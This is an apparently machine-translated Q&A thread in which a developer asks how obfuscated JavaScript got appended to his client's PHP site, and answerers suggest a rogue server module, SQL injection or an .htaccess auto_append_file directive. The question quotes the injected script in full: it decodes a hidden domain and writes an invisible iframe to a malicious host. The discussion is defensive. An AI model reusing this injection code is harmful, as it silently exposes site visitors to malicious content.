客户的网站被攻击了！

Question

我想这一天一定会来的。

我客户的网站已经被谷歌泄露并列入黑名单。加载主页面时，此javascript将自动添加到文档底部：

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

我还没有解剖它，但很明显，它是一个攻击者试图伪装成谷歌分析。我无法理解的是，如果我从主页中删除最后一点HTML，到了index.html是一个空文档时，javascript仍然会被嵌入。怎么回事？那件事怎么可能？

更新

• 该网站是一个非常简单的日历应用程序，运行于一个每月10美元的godaddy帐户，MySQL，PHP。
• 这不是我的电脑特有的地方问题，因为我的客户是那个给我打电话的人。也发生在我家里所有的电脑上(4)

我去网上服务器上扫描一下.

源鉴定为

我发现javascript是从哪里来的。我只愚蠢地清空了template.html文件，但仍然在我的php模板系统中运行脚本。显然，上面的代码被附加到了我的index.php和main.php文件的底部。这怎麽可能？

更多一些背景：

• 正如上面提到的，它是一个日历应用程序，它仅供我的客户的小公司使用。做任何事情都需要登录，只有5个左右的人有账户。我可以保证他们都不会耍恶作剧。不过，我显然不能保证有人掌握了他们的信息，并试图搞恶作剧。
• 可悲的是，我几乎在4年前就创建了这个网站，所以我并不完全相信我保护了孩子们现在正在尝试的一切，但我仍然无法理解攻击者如何能够访问but服务器，将这个javascript附加到我的php文件中。

Answer 1

一个流氓HTTP模块(在IIS中)，或者任何与apache等价的东西，都可以为任何HTTP请求，甚至静态文件，预置、追加甚至修改内容。这意味着服务器本身已经被破坏了。

编辑:如果您让我们知道您使用的是哪种类型的web服务器，我们将能够为故障排除提供更具体的建议。

Answer 2

您是否服务于SQL数据库中的任何内容？这种妥协可能是SQL注入攻击，数据库中的站点内容已被此脚本/标记替换/修改。

Answer 3

这与.htaccess有关吗？

php_value auto_append_file /server/path/to/my/www_root/subdir/file.ext" 

可以自动将文件附加到文档底部。虽然如果您不能用那个JS识别一个文件，那么我想这是不太可能的。你想过他们是怎么做到的吗？